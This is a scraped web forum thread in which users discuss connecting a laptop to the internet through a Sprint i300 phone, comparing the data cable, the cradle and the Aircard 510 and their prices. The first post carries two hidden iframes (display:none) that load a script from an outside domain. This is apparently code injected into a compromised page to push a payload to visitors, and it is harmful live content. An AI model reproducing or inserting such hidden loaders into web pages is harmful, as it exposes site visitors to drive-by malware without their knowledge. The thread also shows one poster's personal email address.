+ Reply to Thread

Laptop Web Connection

All I need is to purchase a data cable from Samsung and then I can connect my laptop to my internet provider through my i300??<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

you can use the cradle to do that... and you dont need to use your isp. you can use sprints..... you need to be signed up for th wireless web anyway to even use this service. it nor real major advantage in using your isp over sprints... in fact, most times sprints isp connects faster...

It would have been nice if the cradle cable could double as a data only cable. It sure would fit better for traveling. The cradle is a pain in the butt, cause it is so big. I never travel w/it. A nice alternative is the AirPhone card 510 that Sprint sells. It is a PCMCIA card for the laptop, it fits in a slot and had a little antenna that pulls out of the card. You look really way cool using that puppy at the airport! You can add the card to your account (it actually gets it's own wireless number) for $10 (yeah the card is a little pricy) and share your pool of minutes. It comes in handy if you need to be on the phone and be connected wirelessly.

The data cable is WAY overpriced.
    Carl

how much is the aircard?

Brooks

Administrator

Arrow

fikse, i think its 300 bucks... :o

I think it was $400 bucks, but there was a $100 service credit on it from Sprint. I bought it back in Aug. I bought it even though I could do the same thing with my 6035 back then. It is VERY convienent, bacause I leave it in my laptop, just pull up the antenna and go, and also as mentioned I can talk to a client about a problem and be looking at it at the same time.
    Carl

I think you can find those cards pretty cheap, sony was giving them away a while back, and alot of people have them. I got two, but dont use them, if someones interested in one.

Tomas,

Are the cards you have CDPD (cellular digital packet data) cards or wireless CDMA cards (the kind Sprint sells)? I'd be interested if you have the CDMA type. The CDPD cards run off the network that AT&T, Verizon, Omnisky, etc. use for their ancient wireless data network..the poorest network I have ever used making the product almost useless. If however you have the CDMA type card, please email me at mmendo1@umbc.edu and hopefully we can work something out.

Aircard 510

Hey guys...

Get on Ebay... those Sprint PCS Aircards (Aircard 510) are going for around $85 brand new.... even though they retail for 249.99.
    AND.. they come with 2500 free minutes.

After that you can share the minutes off your regular sprint plan.